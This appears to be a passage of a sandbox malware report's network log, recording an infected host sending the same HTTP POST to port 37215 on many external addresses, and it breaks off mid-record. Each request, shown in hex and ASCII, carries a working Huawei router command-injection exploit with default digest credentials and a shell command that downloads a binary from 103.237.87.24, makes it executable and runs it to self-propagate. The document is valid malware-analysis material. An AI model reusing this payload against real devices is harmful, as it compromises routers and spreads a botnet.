                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  513192.168.2.135952441.129.198.15137215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:56.118556023 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  514192.168.2.1346534197.201.161.20937215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:56.118558884 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  515192.168.2.1354132208.176.208.20637215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:56.118581057 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  516192.168.2.1333256133.53.206.10737215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:56.118971109 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  517192.168.2.135424241.30.94.21437215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:56.118972063 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  518192.168.2.1358344157.100.64.14437215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:56.118984938 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  519192.168.2.133744638.193.33.1137215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:56.119000912 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  520192.168.2.135196641.187.28.20437215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:56.119374990 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  521192.168.2.1350824140.238.166.16837215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:56.119380951 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  522192.168.2.1338394197.197.17.24537215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:56.119399071 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 